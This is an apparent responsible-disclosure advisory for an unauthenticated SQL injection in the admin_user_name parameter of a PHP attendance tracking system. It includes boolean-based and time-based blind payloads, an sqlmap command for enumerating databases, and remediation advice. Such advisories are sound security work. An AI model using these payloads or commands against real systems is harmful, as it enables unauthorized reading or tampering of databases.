Attendance Tracking Management System V1.0 /admin/admin_action.php SQL injection

[vicleet]

Attendance Tracking Management System PHP & MySQL Project – SQL Injection Vulnerability

1. Overview

A critical SQL injection vulnerability has been identified in the Attendance Tracking Management System PHP & MySQL Project (v1.0). The issue occurs in the file /admin/admin_action.php, where user-supplied input—specifically the admin_user_name parameter—is embedded into SQL statements without proper sanitization. This flaw potentially allows remote attackers to perform unauthorized database operations and compromise system integrity.

• Vendor Homepage: Attendance Tracking Management System PHP & MySQL Project
• Download Source Code: Attendance-Tracking-Management-System.7z
• Submitter: vicleet
• File Affected: /admin/admin_action.php
• Version Affected: v1.0

No login or authorization is required to exploit this vulnerability, elevating its severity.

---

2. Technical Details

2.1 Vulnerability Type

• SQL Injection
  • Boolean-based blind
  • Time-based blind

2.2 Root Cause

The admin_user_name parameter is inserted directly into SQL queries without validation or escaping of special characters. This allows malicious strings to alter the SQL query logic.

Parameter: admin_user_name (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: admin_user_name=-2821" OR 1396=1396-- XqfC&admin_password=password&admin_id=2&action=Edit

Parameter: admin_user_name (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: admin_user_name=admin123" AND (SELECT 2838 FROM (SELECT(SLEEP(5)))iIKL)-- hmQf
         &admin_password=password&admin_id=2&action=Edit

---

3. Impact

Exploiting this vulnerability could allow attackers to:

• Read or Modify Sensitive Data: Database contents might be exposed, altered, or deleted.
• Escalate Privileges: Attackers could gain higher-level database permissions or system access.
• Interrupt Services: Excessive or malicious queries (e.g., using SLEEP) can degrade performance or crash the application.
• Compromise System Integrity: In some cases, the attacker could pivot to other parts of the server or network.

---

4. Exploitation

1. Craft Malicious Input
   Attackers embed SQL injection payloads into the admin_user_name field.

2. Send HTTP POST Request
   A specially crafted request is sent to /admin/admin_action.php with parameters like:

   admin_user_name=admin123" AND (SELECT 2838 FROM (SELECT(SLEEP(5)))iIKL)-- hmQf
   &admin_password=password&admin_id=2&action=Edit

3. Automated Tools
   Tools such as sqlmap facilitate detection and exploitation. For instance:

   sqlmap -u "10.211.55.6:1131/admin/admin_action.php" \
          --data="admin_user_name=admin123&admin_password=password&admin_id=2&action=Edit" \
          --batch --level=5 --risk=3 --dbs

   Successful exploitation grants database insights, as shown in the testing screenshots:

   

---

5. Remediation

• Use Prepared Statements
  Implement parameterized queries to separate SQL logic from user inputs, preventing malicious code execution.

• Strict Input Validation
  Validate and sanitize all user inputs, especially those used in database queries.

• Principle of Least Privilege
  Limit the database user permissions. Avoid using powerful accounts (e.g., root) for day-to-day operations.

• Regular Security Testing
  Perform routine code reviews and security scans to promptly detect and address vulnerabilities.

---

6. References and Further Reading

• Attendance Tracking Management System (Official Page)
• SQL Injection (OWASP Overview)
• sqlmap Documentation

---

Disclaimer:
This wiki-style report is intended for responsible disclosure purposes. Unauthorized exploitation or distribution of these details may violate applicable laws. The vendor should promptly apply the recommended fixes to protect users and maintain system reliability.

---